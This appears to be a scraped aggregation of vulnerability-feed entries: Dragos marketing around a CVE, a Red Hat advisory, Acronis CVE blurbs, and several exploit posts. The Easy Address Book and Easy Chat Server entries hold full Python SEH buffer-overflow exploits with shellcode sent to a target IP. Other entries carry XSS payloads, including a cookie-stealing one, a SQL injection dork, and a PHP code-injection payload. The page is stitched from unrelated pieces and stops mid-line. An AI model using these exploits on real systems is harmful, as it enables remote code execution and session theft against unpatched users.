Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Schweitzer Engineering Laboratories SEL-5036 acSELerator Bay Screen Builder Software on Windows allows Relative Path Traversal.



SEL acSELerator Bay Screen Builder software is distributed by SEL-5033 SEL acSELerator RTAC, SEL-5030 Quickset, and SEL Compass. CVE-2023-31167 and was patched in the acSELerator Bay Screen Builder release available on 20230602. Please contact SEL for additional details.


This issue affects SEL-5036 acSELerator Bay Screen Builder Software: before 1.0.49152.778.



**Industrial Cybersecurity for OT Environments​**

The most effective OT cybersecurity platform, codifying threat intelligence and insights from the industry's largest team of ICS/OT practitioners.

Discover Why Dragos

**Visibility, Detection, and Response for OT Cyber Threats and Vulnerabilities**

The **Dragos Platform** gives you visibility into your ICS/OT assets, vulnerabilities, threats, and response actions, and supports you with forensics and OT-specific playbooks.

**In-Depth Asset Visibility**

The Dragos Platform analyzes multiple data sources including protocols, network traffic, data historians, host logs, asset characterizations, and anomalies to provide unmatched visibility of your ICS/OT environment.

**Unrivaled Threat Detection**

Based on the industry’s best threat intelligence, pinpoint malicious activity on your ICS/OT network, providing in-depth context for alerts, and reducing false positives for unparalleled threat detection.

Dragos Platform

OT Expertise Codified

**Comprehensive Vulnerability Management**

The only ICS/OT solution that provides corrected, prioritized guidance with full lifecycle vulnerability management, tracking historical disposition through automated collection & analysis.

**Investigation and Response**

Expert-authored playbooks to guide your security team step-by-step throughout investigations, decreasing response time and improving the efficiency of your team’s workflow.

**Your Path to Industrial Cybersecurity**

**Secure Your Digital Transformation**

Successfully transform your business and keep your operational technology (OT) environments secure.

**Industrial Cyber Risk Management**

Assess your industrial cyber risk and confidently respond to cyber incidents.

**Ensure ICS/OT Cybersecurity Compliance**

Create simplified, repeatable processes to meet audit and compliance requirements faster and more accurately.

**Solve Your Challenges**

**Start My Industrial Cybersecurity Program**

Are you ready to get your ICS/OT cybersecurity challenges under control? We are here to help you take the next step.

**Improve Visibility of My OT Assets**

You can’t protect what you can’t see. A successful OT security posture maintains an inventory of assets, maps vulnerabilities against those assets, and actively monitors traffic for potential threats.

**Defend Against Ransomware in OT**

OT networks can be directly impacted when ransomware cripples IT. Know what you can do to better protect against this increasing threat.

**Understand the Global Threat Landscape**

Dragos Worldview Threat Intelligence provides the proactive information you need to stay ahead of sophisticated industrial cybersecurity threats.

**Leverage MITRE ATT&CK for ICS**

See how defenders can operationalize MITRE ATT&CK for ICS with the Dragos Platform and Worldview Threat Intelligence.

**The Leader in Industrial Cybersecurity**

Dragos has unmatched experience securing industrial assets across vertical industries.

Chemical

Chemical

Protect the operational technology that helps run chemical production facilities and the valuable intellectual property regarding chemical formulas from a potential cyber attack.

Electric

Electric

Take a proactive, holistic approach to protect the full spectrum of operations and defend your critical electric infrastructure.

Food & Bev

Food & Bev

Benefit from in-depth visibility of assets and threats in your environment, along with playbooks to guide analysts step-by-step as they investigate potential incidents.

Manufacturing

Manufacturing

Analyze the entire spectrum of manufacturing production inputs from support systems, quality control systems, material handling technologies, and automation/control technologies.

Oil & Gas

Oil & Gas

Combine OT threat intelligence, professional services, and the most effective and efficient ICS cybersecurity technology to enhance visibility, detection, and response capabilities in oil and gas environments.

Pharmaceuticals

Pharmaceuticals

Analyze the entire OT spectrum—including systems for processing, quality control, enterprise resource planning, and other critical operations

Transportation

Transportation

Understand supply chain vulnerabilities, IT to OT convergence, and manage network asset inventory in order to systematically reduce cyber risk.

Water

Water

Protect community water & wastewater systems by preventing significant breaches with proactive defense.

**We Understand Industrial Adversaries Better Than Anyone — So You Can Too**

Our experts are the leading authorities in ICS/OT cybersecurity, with real-world experience with landmark attacks on OT networks.

Jodi Schatz

Chief Product Officer

Jon Lavender

Chief Technology Officer and Head of Product

Christophe Culine

President of Global Sales and Chief Revenue Officer

Ben Miller

Vice President Professional Services and R&D

Robert M. Lee

Chief Executive Officer

**What Dragos Customers Say**

“We are convinced that Dragos has significantly helped us increase our overall security posture – as well as our ability to provide the best service possible to our customers. We couldn’t ask for anything better.”

“The Dragos OT Watch team, enabled by Dragos Platform technology, provides a level of visibility into our assets and threats that we did not have the expertise nor the bandwidth to do on our own.”

Doug Short,

CIO & CISO Trinity River Authority of Texas

“Where Dragos differentiates from many \[competitors\] is in the ICS-focused expertise of its team, reflected in its intelligence-centric approach, where its deep and detailed knowledge of the specifics of the ICS threat landscape are born out of experience.”

**Working together with partners to protect you**

No matter where you are on your ICS/OT cybersecurity journey, we have the products and services you need. Let us help get you on the path to success.

CVE-2023-31167: Industrial Cybersecurity Technology for ICS/OT Asset Visibility | Dragos​

Easy Address Book Web Server version 1.6 suffers from buffer overflow and cross site scripting vulnerabilities.

# Exploit Title: Easy Address Book Web Server v1.6 - MultipleVulnerabilities# Discovery by: Rafael Pedrero# Discovery Date: 2021-01-10# CVE: CVE-2023-4491, CVE-2023-4492, CVE-2023-4493# Vendor Homepage: http://www.efssoft.com/web-address-book-server.html# Software Link : http://www.efssoft.com/eabws.exe (md5sum:69f77623bb32589fb5343f598b61bbd9)# Tested Version: 1.6# Tested on:  Windows 7, 10# CVE-2023-4491: Vulnerability Type: searchbook Remote Buffer OverflowCVSS v3: 9.8CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HCWE: CWE-119Vulnerability description: There is a remote stack-based buffer overflow(SEH) in /searchbook.ghp in EFS Software Easy Address Book Web Server 1.6.By sending an overly long username string to /searchbook.ghp for asking thename via POST, an attacker may be able to execute arbitrary code.Proof of concept:import socketimport structdef sendbuff():    # > arwin.exe kernel32.dll WinExec    # WinExec is located at 0x776f2c91 in kernel32.dll    shellcode_WinExec = ("\x33\xc0"                          # XOR EAX,EAX"\x50"                              # PUSH EAX      => padding for lpCmdLine"\x68\x2E\x65\x78\x65"              # PUSH ".exe""\x68\x63\x61\x6C\x63"              # PUSH "calc""\x8B\xC4"                          # MOV EAX,ESP"\x6A\x01"                          # PUSH 1"\x50"                              # PUSH EAX"\xBB\x91\x2c\x6f\x77"              # MOV EBX,kernel32.WinExec"\xFF\xD3")                         # CALL EBX    shellcode_system = (        "\x31\xC9"                # xor ecx,ecx        "\x51"                    # push ecx        "\x68\x63\x61\x6C\x63"    # push 0x636c6163        "\x54"                    # push dword ptr esp        "\xB8\x6f\xb1\xdc\x75"    # mov eax,msvcrt.system        "\xFF\xD0")               # call eax    shellcode = shellcode_WinExec    # SEH    junk1 = "A"*455    buffer =  junk1    buffer += "\xeb\x10\x90\x90"            # jmp 0x10 to nops to shellcode    buffer +=  struct.pack('<L',0x1001071e) # pop/pop/ret @ 0x1001071eSSLEAY32.DLL from !Mona 0x1001071e    buffer += "\x90" * 20    buffer += shellcode    junk2 =  "D"*(840 - 455 - len(shellcode) - 4 - 4 - 20)    buffer += junk2    return bufferdef REQ_POST (padding):    POST = (    "POST http://"+str(ip)+"/searchbook.ghp?id=1 HTTP/1.1\r\n"    "User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0\r\n"    "Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"    "Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3\r\n"    "Content-Type: application/x-www-form-urlencoded\r\n"    "Content-Length: " + str(108 + len(padding))+ "\r\n"    "Connection: keep-alive\r\n"    "Referer: http://"+str(ip)+"/searchcontact.ghp?id=1\r\n"    "Cookie: SESSIONID=3938; UserID=; PassWD=\r\n"    "Upgrade-Insecure-Requests: 1\r\n"    "Host: "+str(ip)+"\r\n\r\n"    "addrbookid=1&contactid=%3C%21--cid--%3E&cancelflag=0&name=" + padding+"&cancelflag=0&name=AAA&Email=&address=&phone=&other=&search=Start+Search\r\n\r\n"    )    return POSTip = '192.168.X.X'port = 80payload = sendbuff()try:    print "\n[*] Sending POST (searchbook.ghp) exploit to Easy Address BookWeb Server V1.6, length " + str(len(payload))    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    s.connect((ip, port))    s.send(REQ_POST(payload))    s.recv(1024)    s.close()    print "\n[*] Sended POST length " + str(len(payload))except:    print "Connecting error"# CVE-2023-4492: Vulnerability Type: stored Cross-Site Scripting (XSS) - #1CVSS v3: 6.5CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NCWE: CWE-79Vulnerability description: Easy Address Book Web Server v1.6, does notsufficiently encode user-controlled inputs, resulting in a storedCross-Site Scripting (XSS) vulnerability via the /addrbook.ghp (POSTmethod), in multiple parameters.Proof of concept:POST http://localhost/addrbook.ghp?id=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Content-Type: application/x-www-form-urlencodedContent-Length: 475Origin: http://localhostConnection: keep-aliveReferer: http://localhost/editcontact.ghp?id=1&cid=12Cookie: SESSIONID=15337; UserID=; PassWD=Upgrade-Insecure-Requests: 1Host: localhostaddrbookid=1&contactid=14&cancelflag=0&firstname=%3C%2Fa%3E%3Cscript%3Ealert%2811%29%3B%3C%2Fscript%3E%3Ca%3E&middlename=demo1&lastname=demo1&nickname=demo1&Email=demo1%40demo1.com&company=demo1&jobtitle=demo1&department=demo1&office=demo1&workphone=&workfax=&workaddress=demo1&workcity=&workstate=&workzip=&workcountry=USA&homephone=&homefax=&homeaddress=demo1&homecity=&homestate=&homezip=&homecountry=USA&mobilephone=&pager=&email2=&email3=&homepage=&notes=demo1&save=SaveVulnerable parameters: firstname, homephone, lastname, middlename,workaddress, workcity, workcountry, workphone, workstate, workzipResponse: <TR>              <TD class=row2><SPAN class=genmed><A target=_blankclass=genmed href="viewcontact.ghp?id=1&cid=12">demo1</a><script>alert(1);</script><a> demo1</A></SPAN></TD>              <TD class=row2 align=left><SPAN class=genmed><a href="mailto:demo1@demo1.com">demo1@demo1.com</a></SPAN></TD>              <TD class=row2 align=left><SPAN class=genmed></SPAN></TD>              <TD class=row2 align=left><SPAN class=genmed></SPAN></TD>              <TD class=row2 align=left><SPAN class=genmed>demo1, , , ,USA</SPAN></TD>              <TD class=row2 align=left><SPAN class=genmed><ahref="editcontact.ghp?id=1&cid=12">Edit</a></SPAN></TD>              <TD class=row2 align=left><SPAN class=genmed><ahref="javascript:deletecontact('deletecontact.ghp?id=1&cid=12','demo1</a><script>alert(1);</script><a> demo1')">Delete</a></SPAN></TD># CVE-2023-4493: Vulnerability Type: stored Cross-Site Scripting (XSS) - #2CVSS v3: 6.5CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NCWE: CWE-79Vulnerability description: Easy Address Book Web Server v1.6, does notsufficiently encode user-controlled inputs, resulting in a storedCross-Site Scripting (XSS) vulnerability via the /users_admin.ghp (POSTmethod, authenticated Admin user), in multiple parameters.Proof of concept:Example 1:POST http://localhost/users_admin.ghp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Content-Type: application/x-www-form-urlencodedContent-Length: 134Origin: http://localhostConnection: keep-aliveReferer: http://localhost/users_admin.ghpCookie: SESSIONID=19655; UserID=Admin; PassWD=<redacted>Upgrade-Insecure-Requests: 1Host: localhostuserid=2&username=test&password=test&email=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&level=user&state=Enable&update_user=UpdateVulnerable parameter: emailResponse:<form method="POST" action=""><TR><input type="hidden" name="userid" value="2"><TD class=row2 align=left><input type="text" name="username" size="15"value="test"> </TD><TD class=row2 align=left><input type="text" name="password" size="15"value=""> </TD><TD class=row2 align=left><input type="text" name="email" size="35"value=""><script>alert(1);</script>"> </TD><TD class=row2 align=left><select name="level"><option>guest</option><option selected>user</option><option >poweruser</option></select></TD><TD class=row2 align=left><select name="state"><optionselected>Enable</option><option >Disable</option></select></TD><TD class=row2 align=left><input type="submit" value="Update"name="update_user"></TD><TD class=row2><SPAN class=genmed><A class=genmedhref="user_delete_admin.ghp?2">Delete</A></SPAN></TD></TR></form>Example 2:POST http://localhost/users_admin.ghp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Content-Type: application/x-www-form-urlencodedContent-Length: 144Origin: http://localhostConnection: keep-aliveReferer: http://localhost/users_admin.ghpCookie: SESSIONID=19655; UserID=Admin; PassWD=<redacted>Upgrade-Insecure-Requests: 1Host: localhostuserid=2&username=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&password=test&email=tt%40fsdfs.com&level=user&state=Enable&update_user=UpdateVulnerable parameter: usernameResponse:<form method="POST" action=""><TR><input type="hidden" name="userid" value="2"><TD class=row2 align=left><input type="text" name="username" size="15"value=""><script>alert(1);</script>"> </TD><TD class=row2 align=left><input type="text" name="password" size="15"value=""> </TD><TD class=row2 align=left><input type="text" name="email" size="35" value="tt@fsdfs.com"> </TD><TD class=row2 align=left><select name="level"><option>guest</option><option selected>user</option><option >poweruser</option></select></TD><TD class=row2 align=left><select name="state"><optionselected>Enable</option><option >Disable</option></select></TD><TD class=row2 align=left><input type="submit" value="Update"name="update_user"></TD><TD class=row2><SPAN class=genmed><A class=genmedhref="user_delete_admin.ghp?2">Delete</A></SPAN></TD></TR></form>-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------# Exploit Title: Easy Chat Server v3.1 - Multiple Vulnerabilities# Discovery by: Rafael Pedrero# Discovery Date: 2021-01-09# CVE: CVE-2023-4494, CVE-2023-4495, CVE-2023-4496, CVE-2023-4497# Vendor Homepage: http://www.echatserver.com/# Software Link : http://echatserver.com/ecssetup.exe (md5sum:c682138ebbea9af7948a3f142bbd054b)# Tested Version: 3.1# Tested on:  Windows 7, 10# CVE-2023-4494: Vulnerability Type: register Remote Buffer OverflowCVSS v3: 9.8CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HCWE: CWE-119Vulnerability description: There is a remote stack-based buffer overflow(SEH) in register.ghp in EFS Software Easy Chat Server versions 2.0 to 3.1.By sending an overly long username string to register.ghp for asking theusername via GET, an attacker may be able to execute arbitrary code.Proof of concept:import socketdef sendbuff():    # calc shellcode from https://code.google.com/p/win-exec-calc-shellcode/    # msfencode -b "\x00\x20" -i w32-exec-calc-shellcode.bin    # [*] x86/shikata_ga_nai succeeded with size 101 (iteration=1)    shellcode = (    "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" +    "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" +    "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" +    "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" +    "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" +    "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" +    "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" +    "\x1c\x39\xbd"    )    # SEH    junk1 = "A"*473    buffer =  junk1    buffer += "\xeb\x06\x90\x90"           # short jmp to shellcode    buffer += "\x1e\x0e\x01\x10"           # pop/pop/ret @ 0x10010E1ESSLEAY32.DLL from !Mona    buffer += shellcode    junk2 =  "D"*(600 - 473 - len(shellcode) - 4 - 4)    buffer += junk2    return bufferdef REQ_GET (padding):    GET = (    "GET /register.ghp?username=" + padding + "&password= HTTP/1.1\r\n"    "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/86.0.4240.75 Safari/537.36\r\n"    "Host: "+str(ip)+":80\r\n"    "Accept-Language: es-es\r\n"    "Accept-Encoding: gzip, deflate\r\n"    "Referer: http://"+str(ip)+"\r\n"    "Connection: Keep-Alive\r\n\r\n"    )    return GETip = '192.168.X.X' # change the ip addressport = 80payload = sendbuff()try:    print "\n[*] Sending GET (register.ghp) exploit to EFS Easy Chat Server3.1, length " + str(len(payload))    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    s.connect((ip, port))    s.send(REQ_GET(payload))    s.recv(1024)    s.close()    print "\n[*] Sended GET length " + str(len(payload))except:    print "Connection error"# CVE-2023-4495: Vulnerability Type: stored Cross-Site Scripting (XSS) - #1CVSS v3: 6.5CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NCWE: CWE-79Vulnerability description: Easy Chat Server v3.1, does not sufficientlyencode user-controlled inputs, resulting in a stored Cross-Site Scripting(XSS) vulnerability via the /registresult.htm (POST method), in Resumeparameter. The XSS is loaded from /register.ghp.Proof of concept:POST http://localhost/registresult.htm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Content-Type: application/x-www-form-urlencodedContent-Length: 257Origin: http://localhostConnection: keep-aliveReferer: http://localhost/register.ghp?username=<redacted>&password=<redacted>Upgrade-Insecure-Requests: 1Host: localhostUserName=<redacted>&Password=<redacted>&Password1=demo1&Sex=0&Email=demo1%25252540demo1.com&Icon=0.gif&Resume=%3C%2FTEXTAREA%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3CTEXTAREA%3E&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=ChangeResponse<BODY bgcolor="#b8d0dc"><center>Congratulations! Your information has beenchanged successfully.</center></body>Go to:http://localhost/register.ghp?username=<redacted>&password=<redacted>Response - xss:<TR><TD>Your profile/interests:<BR><TEXTAREA rows="4" cols="30"name="Resume"></TEXTAREA><script>alert(1)</script><TEXTAREA></TEXTAREA><INPUT type="hidden" name="cw" value="0"><INPUT type="hidden" name="RoomID" value=""><INPUT type="hidden" name="RepUserName" value=""></TD></TR># CVE-2023-4496: Vulnerability Type: stored Cross-Site Scripting (XSS) - #2CVSS v3: 6.5CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NCWE: CWE-79Vulnerability description: Easy Chat Server v3.1, does not sufficientlyencode user-controlled inputs, resulting in a stored Cross-Site Scripting(XSS) vulnerability via the /body2.ghp (POST method), in mtowho parameter.Proof of concept:POST http://localhost/body2.ghp?username=<redacted>&password=<redacted>&room=4HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Content-Type: application/x-www-form-urlencodedContent-Length: 248Origin: http://localhostConnection: keep-aliveReferer: http://localhost/chatsubmit.ghp?username=<redacted>&password=<redacted>&room=4Upgrade-Insecure-Requests: 1Host: localhoststaticname=%3A000539&tnewname=&msayinfo=demo+&mnewname=&mtowho=%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cscript%3E&mfilters=0&mfont=0&mfcolor=1&elist=100&seltype=Theme&msg=&Submit=Send&sc=on&notifysound=on&message=demo+&chat_flag=Response:<html><head></head><body><script language="JavaScript"></script></body></html># CVE-2023-4497: Vulnerability Type: stored Cross-Site Scripting (XSS) - #3CVSS v3: 6.5CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NCWE: CWE-79Vulnerability description: Easy Chat Server v3.1, does not sufficientlyencode user-controlled inputs, resulting in a stored Cross-Site Scripting(XSS) vulnerability via the /registresult.htm (POST method), in Iconparameter. The XSS is loaded from /users.ghp.Proof of concept:POST /registresult.htm HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 235Origin: http://localhostConnection: closeReferer: http://localhost/register.ghp?username=<redacted>&password=<redacted>Upgrade-Insecure-Requests: 1UserName=<redacted>&Password=<redacted>&Password1=<redacted>&Sex=0&Email=<redacted>%252525252540<redacted>.com&Icon="><script>alert(111)</script><img%20src="1.gif&Resume=AAA&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=ChangeResponse:<BODY bgcolor="#b8d0dc"><center>Congratulations! Your information has beenchanged successfully.</center></body>When user information page load:http://localhost/users.ghp?username=<redacted>&password=<redacted>&room=4&nbsp;<font color="red">[vip room]</font><br><br>[Online users:1]<br><br>[<ahref="javascript:parent.chatsubmit.getname('All');"target="chatsubmit">All</a>]<br><br><script>if(navigator.appName!="Netscape" && parent.chatsubmit.document &&parent.chatsubmit.document.readyState == "complete")parent.chatsubmit.listcolorchange();</script><img src="/images/""><script>alert(111)</script><i>[<ahref="javascript:parent.chatsubmit.getname('<redacted>');"target="chatsubmit"><redacted></a>]<==<br><br><br><br>[<a href="javascript:OnRegister();">Change infomation</a>]</i>

Easy Address Book Web Server 1.6 Buffer Overflow / Cross Site Scripting

Local privilege escalation during recovery due to improper soft link handling. The following products are affected: Acronis Cyber Protect Home Office (Windows) before build 40173.

CVE-2022-46868

Local privilege escalation due to insecure driver communication port permissions. The following products are affected: Acronis Cyber Protect Home Office (Windows) before build 40173, Acronis Agent (Windows) before build 30600, Acronis Cyber Protect 15 (Windows) before build 30984.

CVE-2022-45451

Excessive attack surface due to binding to an unrestricted IP address. The following products are affected: Acronis Agent (Linux, macOS, Windows) before build 30430, Acronis Cyber Protect 15 (Linux, macOS, Windows) before build 35979.

CVE-2023-41742

PHP JABBERS PHP Review Script version 1.0 suffers from a cross site scripting vulnerability.

    ## Title: PHPJABBERS-PHP Review Script-1.0 XSS-Reflected## Author: nu11secur1ty## Date: 08/31/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/php-review-script/## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected## Description:The value of the `action` request parameter is copied into the HTMLdocument as plain text between tags. The payload aelll<img src=aonerror=alert(1)>nx0ib was submitted in the action parameter. Thisinput was echoed unmodified in the application's response. Theattacker can steal a PHPSESSID cookie!STATUS: HIGH Vulnerability[+]Exploit:```GETGET /1693484209_401/hipark-residence.php?controller=pjLoad&action=pjActionPostaelll%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3enx0ibHTTP/1.1Host: demo.phpjabbers.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111Safari/537.36Connection: closeCache-Control: max-age=0Cookie: _ga=GA1.2.221094441.1693486538;_gid=GA1.2.1044601458.1693486538; _gat=1;_fbp=fb.1.1693486538348.177361623;_ga_NME5VTTGTT=GS1.2.1693486538.1.1.1693486541.57.0.0Upgrade-Insecure-Requests: 1Referer: http://demo.phpjabbers.com/1693484209_401/hipark-residence.php?controller=pjLoad&action=pjActionIndex&pjPage=1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Review-Script-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/08/phpjabbers-php-review-script-10-xss.html)## Time spend:01:05:00

PHP JABBERS PHP Review Script 1.0 Cross Site Scripting

Innovins CMS version 4.7 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Innovins CMS v4.7 Sql Injection Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://www.innovins.com/                                                                                          || # Dork      : intext:Developed by - Innovins                                                                                     |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : events2.php?id= [+] http://www.127.0.0.1saingoorg/events2.php?id= <===== inject herGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Innovins CMS 4.7 SQL Injection

Red Hat Security Advisory 2023-4885-01 - Red Hat OpenShift support for Windows Containers allows you to deploy Windows container workloads running on Windows Server containers. Issues addressed include a privilege escalation vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenShift support for Windows Containers 8.0.2 security update  
Advisory ID:       RHSA-2023:4885-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4885  
Issue date:        2023-08-30  
CVE Names:         CVE-2023-3676 CVE-2023-3955   
=====================================================================

1. Summary:

The components for Red Hat OpenShift support for Windows Containers 8.0.2  
are now available. This product release includes bug fixes and security  
updates for the following packages: windows-machine-config-operator and  
windows-machine-config-operator-bundle.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift support for Windows Containers allows you to deploy  
Windows container workloads running on Windows Server containers.

Security Fix(es):

* kubernetes: Insufficient input sanitization on Windows nodes leads to  
privilege escalation (CVE-2023-3676)

* kubernetes: Insufficient input sanitization on Windows nodes leads to  
privilege escalation (CVE-2023-3955)

For more details about the security issue(s), including the impact, CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For Windows Machine Config Operator upgrades, see the following  
documentation:  
https://docs.openshift.com/container-platform/latest/windows_containers/windows-node-upgrades.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2227126 - CVE-2023-3676 kubernetes: Insufficient input sanitization on Windows nodes leads to privilege escalation  
2227128 - CVE-2023-3955 kubernetes: Insufficient input sanitization on Windows nodes leads to privilege escalation

5. References:

https://access.redhat.com/security/cve/CVE-2023-3676  
https://access.redhat.com/security/cve/CVE-2023-3955  
https://access.redhat.com/security/updates/classification/#important

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk7+KuAAoJENzjgjWX9erE3lMP/2jePX7S115czncgIpDraYAR  
x8aCx7Kyk6iIRDHIXYM3TOIRLDJHVX7/3oFxl4cCAd4/DskE5jchlrw3QWVC8qfp  
InGscpQWdAJN+jtRz8IpJLpR6YYJ79/3lMHkCZQ05zcFG0yEv2VBTTpffOpjuAg5  
kD2KVwbT7TR7Pfbj2chQ9rZW2yppBuYgXq6l5Ssma+HoHkgzi+dj+E6GtZyptJX+  
7704STpEYHVRnooatp+eYpTkHwXdelQMZsD4PmjTWCEqC5UuuHUNMQ01lsnsY/IK  
mUwUgIwG0Lp7qSGunzS39kQqmE/KFVZ+BCjinx00OidBuSM6Q2NNYxjlvljBdptt  
kkhHcgYNCkD1Jbm2rM8Iz9tdLsW/+pru4gQ40FT0ZeW2FRD1cCinkV9k3301VSEh  
MO9ocRTzrqEaVbKkpZy8c4wKNA049YnfoMvUSeasVpgOwhJbsuZzd6BVx2jcQkoQ  
kSYv/JpHVn3p9vuqyUnmH3ANGrKSqsphDs3Z5sXykoMrcTHX5Va0913Im+dtHWw2  
nHNBH82IGcSjtTB6ZnmYF1c7c7DEGTmodvwsktI4Q3K/kCE18W7QYJi66T+GZJGq  
zGvn1xaKaazPpNfh2RDRq3w86v6MzpUWuEqDz7ZAVr1+AKaCLI8odGsQslajsjMJ  
7yYr7+mVO9zmtqxzword  
=0vpr  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4885-01

Islam CMS version 1.0 suffers from a remote PHP code injection vulnerability.

    ====================================================================================================================================| # Title     : islam cms v1.0 PHP code injection Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://almohtaref.net/                                                                                            || # Dork      : R.I.P                                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This vulnerability affects /islamcms/index.php [+] In the search box use payload :     http://127.0.0.1/islamcms/index.php?name=search    ${@system(dir)}    ${@print inoushka}    word=%24%7b%40print indoushka}%7dGreetings to :=========================================================================================================================jericho * Larry W. 